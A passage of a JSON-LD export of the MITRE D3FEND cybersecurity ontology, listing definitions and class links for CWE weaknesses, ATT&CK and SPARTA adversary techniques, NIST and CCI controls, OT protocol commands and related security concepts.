      "skos:prefLabel": "Mission-Operated Ground System"
    },
    {
      "@id": "d3f:DataLinkLink",
      "@type": "owl:Class",
      "d3f:definition": "A communication link between two network devices connected directly at the physical layer and on the same network segment; i.e., an OSI Layer 2 link.",
      "d3f:synonym": [
        "Data Link Layer Link",
        "Layer-2 Link",
        "Link Layer Link"
      ],
      "rdfs:label": "Data Link Link",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Link_layer"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "d3f:SecurityArchitects",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TargetAudience"
      ],
      "rdfs:label": "Security Architects"
    },
    {
      "@id": "d3f:CCI-001858_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a real-time alert in an organization-defined real-time period to organization-defined personnel, roles, and/or locations when organization-defined audit failure events requiring real-time alerts occur.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-14T00:00:00"
      },
      "rdfs:label": "CCI-001858"
    },
    {
      "@id": "d3f:CWE-639",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-639",
      "d3f:definition": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.",
      "d3f:synonym": [
        "Broken Object Level Authorization / BOLA",
        "Horizontal Authorization",
        "Insecure Direct Object Reference / IDOR"
      ],
      "rdfs:label": "Authorization Bypass Through User-Controlled Key",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-863"
      }
    },
    {
      "@id": "d3f:CWE-781",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-781",
      "d3f:definition": "The product defines an IOCTL that uses METHOD_NEITHER for I/O, but it does not validate or incorrectly validates the addresses that are provided.",
      "rdfs:label": "Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1285"
      }
    },
    {
      "@id": "d3f:CWE-917",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-917",
      "d3f:definition": "The product constructs all or part of an expression language (EL) statement in a framework such as a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed.",
      "d3f:synonym": "EL Injection",
      "rdfs:label": "Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-77"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_26",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Audit Filtering Actions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:FileContentRules"
      },
      "rdfs:label": "AC-4(26)"
    },
    {
      "@id": "d3f:SomersD",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SD",
      "rdfs:label": "Somers' D",
      "rdfs:subClassOf": {
        "@id": "d3f:RankCorrelationCoefficient"
      }
    },
    {
      "@id": "d3f:CWE-539",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-539",
      "d3f:definition": "The web application uses persistent cookies, but the cookies contain sensitive information.",
      "rdfs:label": "Use of Persistent Cookies Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:CWE-1209",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1209",
      "d3f:definition": "The reserved bits in a hardware design are not disabled prior to production. Typically, reserved bits are used for future capabilities and should not support any functional logic in the design. However, designers might covertly use these bits to debug or further develop new capabilities in production hardware. Adversaries with access to these bits will write to them in hopes of compromising hardware state.",
      "rdfs:label": "Failure to Disable Reserved Bits",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:contributor",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:OTProcessDataCommand",
      "@type": "owl:Class",
      "d3f:definition": "Manage data associated with a controlled process.",
      "rdfs:label": "OT Process Data Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:Kernel-basedProcessIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Kernel-basedProcessIsolation"
      ],
      "d3f:d3fend-id": "D3-KBPI",
      "d3f:definition": "Using kernel-level capabilities to isolate processes.",
      "d3f:isolates": {
        "@id": "d3f:Process"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-OverviewOfTheSeccompSandbox"
      },
      "rdfs:comment": "e.g. KVM",
      "rdfs:label": "Kernel-based Process Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:N361a6d8cb66b4bf290118abf8cd81a2b"
        }
      ]
    },
    {
      "@id": "_:N361a6d8cb66b4bf290118abf8cd81a2b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:T1628",
      "@type": "owl:Class",
      "d3f:attack-id": "T1628",
      "d3f:definition": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Mobile operating systems have features and developer APIs to hide various artifacts, such as an application’s launcher icon. These APIs have legitimate usages, such as hiding an icon to avoid application drawer clutter when an application does not have a usable interface. Adversaries may abuse these features and APIs to hide artifacts from the user to evade detection.",
      "rdfs:label": "Hide Artifacts - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Hide Artifacts"
    },
    {
      "@id": "d3f:CWE-41",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-41",
      "d3f:definition": "The product is vulnerable to file system contents disclosure through path equivalence. Path equivalence involves the use of special characters in file and directory names. The associated manipulations are intended to generate multiple names for the same object.",
      "rdfs:label": "Improper Resolution of Path Equivalence",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:T1154",
      "@type": "owl:Class",
      "d3f:attack-id": "T1154",
      "d3f:definition": "The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common  keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.005",
      "rdfs:label": "Trap",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:forges",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x forges y: An technique or agent x counterfeits a digital artifact y, such as a fake credential, with the intent to deceive.",
      "rdfs:label": "forges",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01657814-v"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:creates"
      }
    },
    {
      "@id": "d3f:DigitalMultimedia",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Digital Multimedia refers to content that combines text, audio, images, animations, and video in a digital format for interactive applications.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Multimedia",
      "rdfs:label": "Digital Multimedia",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:T1090",
      "@type": "owl:Class",
      "d3f:attack-id": "T1090",
      "d3f:definition": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.",
      "rdfs:label": "Proxy",
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:PhysicalLinkDownEvent",
      "@type": "owl:Class",
      "d3f:definition": "Carrier or negotiation is lost, or the port is shut, rendering the link non-operational while the medium remains connected.",
      "rdfs:label": "Physical Link Down Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:N881eb41e55454bfdaf3a647d3602659b"
        },
        {
          "@id": "_:Nf374ed67fdb84e53ad73c9e8cfad1d7e"
        }
      ]
    },
    {
      "@id": "_:N881eb41e55454bfdaf3a647d3602659b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkUpEvent"
      }
    },
    {
      "@id": "_:Nf374ed67fdb84e53ad73c9e8cfad1d7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkDisconnectEvent"
      }
    },
    {
      "@id": "d3f:CWE-384",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-384",
      "d3f:definition": "Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.",
      "rdfs:label": "Session Fixation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-610"
      }
    },
    {
      "@id": "d3f:TrajectoryPrediction",
      "@type": "owl:Class",
      "rdfs:label": "Trajectory Prediction",
      "rdfs:subClassOf": {
        "@id": "d3f:Forecasting"
      }
    },
    {
      "@id": "d3f:PowerSupply",
      "@type": "owl:Class",
      "d3f:definition": "A power supply is an electrical device or module that converts and regulates energy from a source (e.g., the power grid or batteries) to an appropriate voltage, current, and frequency for one or more loads. It may stand alone or be integrated into its host appliance, often providing overcurrent protection, voltage regulation, or power conditioning for safe, stable operation.",
      "rdfs:label": "Power Supply",
      "rdfs:seeAlso": {
        "@id": "dbr:Power_supply"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Automated Trend Analyses",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "rdfs:label": "RA-5(6)"
    },
    {
      "@id": "d3f:EX-0010.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0010.01",
      "d3f:definition": "Ransomware on a spacecraft encrypts data or critical configuration so that nominal operations can no longer proceed without the attacker’s cooperation. Targets include mass-memory file stores (engineering telemetry, payload data), configuration and command tables, event logs, on-board ephemerides, and even intermediate buffers used by downlink pipelines. Some variants interfere with key services instead of bulk data, e.g., encrypting a command dictionary or table index so valid inputs are rejected, or wrapping the payload data path in an attacker-chosen cipher so downlinked products appear as noise. By denying access to on-board content or control artifacts at scale, attackers convert execution into bargaining power or irreversible mission degradation.",
      "rdfs:label": "Ransomware - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0010"
      },
      "skos:prefLabel": "Ransomware"
    },
    {
      "@id": "d3f:T1110",
      "@type": "owl:Class",
      "d3f:attack-id": "T1110",
      "d3f:definition": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.",
      "rdfs:label": "Brute Force",
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:WindowsWriteProcessMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Writes data to an area of memory in a specified process. The entire area to be written to must be accessible or the operation fails.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtFlushInstructionCache"
        },
        {
          "@id": "d3f:WindowsNtProtectVirtualMemory"
        },
        {
          "@id": "d3f:WindowsNtWriteVirtualMemory"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory"
      },
      "rdfs:label": "Windows WriteProcessMemory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIWriteMemory"
        },
        {
          "@id": "_:Nb7e0474360ed469280e469b356cfabe8"
        },
        {
          "@id": "_:N254fdf1c36b341569405f6cfd9425d97"
        },
        {
          "@id": "_:N34cad6d64f1c43b1a6cb44c0d9440c79"
        }
      ]
    },
    {
      "@id": "_:Nb7e0474360ed469280e469b356cfabe8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtFlushInstructionCache"
      }
    },
    {
      "@id": "_:N254fdf1c36b341569405f6cfd9425d97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtProtectVirtualMemory"
      }
    },
    {
      "@id": "_:N34cad6d64f1c43b1a6cb44c0d9440c79",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtWriteVirtualMemory"
      }
    },
    {
      "@id": "d3f:OTAbortCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a device to abort a service/program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Abort Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N6540a0c003fb46c789eec2f1553527ce"
        }
      ]
    },
    {
      "@id": "_:N6540a0c003fb46c789eec2f1553527ce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:AuthenticationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the systematic process of verifying an agent's identity within a system, involving credential validation and identity confirmation.",
      "rdfs:label": "Authentication Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/authentication"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nf547b9667c02435e8093e61933a6c253"
        },
        {
          "@id": "_:N2bd8038bf459432eb0957c3152798b5a"
        },
        {
          "@id": "_:N1fc5b65e244f4cfb8c4e496d2c064116"
        }
      ],
      "skos:altLabel": "Agent Authentication Event"
    },
    {
      "@id": "_:Nf547b9667c02435e8093e61933a6c253",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:caused-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:N2bd8038bf459432eb0957c3152798b5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "_:N1fc5b65e244f4cfb8c4e496d2c064116",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:process-property",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x process-property y: The process x has the a process-property y.  This is generalization for specific process object properties.",
      "rdfs:label": "process-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1483",
      "@type": "owl:Class",
      "d3f:attack-id": "T1483",
      "d3f:definition": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1568.002",
      "rdfs:label": "Domain Generation Algorithms",
      "rdfs:seeAlso": {
        "@id": "d3f:T1568.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:Reference-DecoyNetwork-BasedServiceForDeceivingAttackers-AmazonTechnologies",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10873601B1"
      },
      "d3f:kb-abstract": "A decoy network-based service uses a decoy credential to lure an attacker to access the decoy network-based service, and monitors the attacker's activity with respect to the decoy network-based service to determine the attacker's motivation. In various examples, a decoy credential is published on an Internet-accessible site, and a system that provides a network-based service (e.g., a service provider network) subsequently receives an access request from a computing device that includes the decoy credential. Based on the decoy credential, the computing device may be provided access to a decoy network-based service, and application programming interface (API) calls made by the computing device may be routed through a decoy control plane. The data relating to the API calls may be stored and analyzed to determine a motivation of the attacker, which may be used in various downstream applications to improve security for customers of the network-based service.",
      "d3f:kb-author": "Thomas Stickle",
      "d3f:kb-mitre-analysis": "MITRE analysis was not found.",
      "d3f:kb-organization": "Amazon Technologies",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyUserCredential"
      },
      "d3f:kb-reference-title": "Decoy network-based service for deceiving attackers",
      "rdfs:label": "Reference - Decoy Network-Based Service for Deceiving Attackers - Amazon Technologies"
    },
    {
      "@id": "d3f:CWE-833",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-833",
      "d3f:definition": "The product contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock.",
      "rdfs:label": "Deadlock",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:T1036.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.002",
      "d3f:definition": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Right-to-Left Override",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:Nbf1d7bc3279e4858a57ec7514cb2aee2"
        }
      ]
    },
    {
      "@id": "_:Nbf1d7bc3279e4858a57ec7514cb2aee2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:CWE-316",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-316",
      "d3f:definition": "The product stores sensitive information in cleartext in memory.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:CWE-920",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-920",
      "d3f:definition": "The product operates in an environment in which power is a limited resource that cannot be automatically replenished, but the product does not properly restrict the amount of power that its operation consumes.",
      "rdfs:label": "Improper Restriction of Power Consumption",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:validated-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x validated-by y: The digital artifact x has its authenticity and correctness confirmed or verified by the technique, operation, or agent y.",
      "rdfs:label": "validated-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:SymbolicAI",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SR",
      "d3f:definition": "Symbolic artificial intelligence is the term for the collection of all methods in artificial intelligence that are based on high-level symbolic (human-readable) representations of problems, logic, and search.",
      "d3f:kb-article": "## How it works\nSymbolic artificial intelligence is used in tools such as logic programming, production rules, semantic nets and frames, and it developed applications such as knowledge-based systems (in particular, expert systems), symbolic mathematics, automated theorem provers, ontologies, the semantic web, and automated planning and scheduling systems. The Symbolic AI paradigm led to seminal ideas in search, symbolic programming languages, agents, multi-agent systems, the semantic web, and the strengths and limitations of formal knowledge and reasoning systems.\n\n## References\n1. Symbolic artifical intelligence. (2023, May 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Symbolic_artificial_intelligence)",
      "d3f:synonym": "Symbolic Artificial Intelligence",
      "rdfs:label": "Symbolic AI",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicLogic"
      }
    },
    {
      "@id": "d3f:ConfigurationDatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Configuration Database Record defines settings, parameters, or preferences for applications, systems, or devices.",
      "d3f:synonym": "Configuration Record",
      "rdfs:label": "Configuration Database Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationResource"
        },
        {
          "@id": "d3f:DatabaseRecord"
        }
      ]
    },
    {
      "@id": "d3f:CWE-160",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-160",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Leading Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CWE-682",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-682",
      "d3f:definition": "The product performs a calculation that generates incorrect or unintended results that are later used in security-critical decisions or resource management.",
      "rdfs:label": "Incorrect Calculation",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:DE-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0002.01",
      "d3f:definition": "Threat actors may utilize access to the ground system to inhibit its ability to accurately process, render, or interpret spacecraft telemetry, effectively leaving ground controllers unaware of the spacecraft’s true state or activity. This may involve traditional denial-based techniques, such as disabling telemetry software, corrupting processing pipelines, or crashing display interfaces. In addition, more subtle deception-based techniques may be used to falsify telemetry data within the ground system ,  such as modifying command counters, acknowledgments, housekeeping data, or sensor outputs ,  to provide the appearance of nominal operation. These actions can suppress alerts, mask unauthorized activity, or prevent both automated and manual mitigations from being initiated based on misleading ground-side information. Because telemetry is the primary method by which ground controllers monitor the health, behavior, and safety of the spacecraft, any disruption or falsification of this data directly undermines situational awareness and operational control.",
      "rdfs:label": "Inhibit Ground System Functionality - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0002"
      },
      "skos:prefLabel": "Inhibit Ground System Functionality"
    },
    {
      "@id": "d3f:CWE-441",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-441",
      "d3f:definition": "The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product's control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.",
      "d3f:synonym": "Confused Deputy",
      "rdfs:label": "Unintended Proxy or Intermediary ('Confused Deputy')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-610"
      }
    },
    {
      "@id": "d3f:CWE-13",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-13",
      "d3f:definition": "Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers.",
      "rdfs:label": "ASP.NET Misconfiguration: Password in Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-260"
      }
    },
    {
      "@id": "d3f:T1067",
      "@type": "owl:Class",
      "d3f:attack-id": "T1067",
      "d3f:definition": "A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1542.003",
      "rdfs:label": "Bootkit",
      "rdfs:seeAlso": {
        "@id": "d3f:T1542.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002308_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals the capability to define or change the type of security attributes available for association with objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002308"
    },
    {
      "@id": "d3f:CWE-82",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-82",
      "d3f:definition": "The web application does not neutralize or incorrectly neutralizes scripting elements within attributes of HTML IMG tags, such as the src attribute.",
      "rdfs:label": "Improper Neutralization of Script in Attributes of IMG Tags in a Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-83"
      }
    },
    {
      "@id": "d3f:ServiceApplicationProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Service Application Process performs specific tasks or provides functionality to support other processes, applications, or users.",
      "rdfs:label": "Service Application Process",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationProcess"
      }
    },
    {
      "@id": "d3f:T1574.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.006",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)",
      "d3f:modifies": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "rdfs:label": "Dynamic Linker Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:Nb3c51a72baaf43318b16c9df3a6a627b"
        }
      ]
    },
    {
      "@id": "_:Nb3c51a72baaf43318b16c9df3a6a627b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "d3f:T1566.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1566.003",
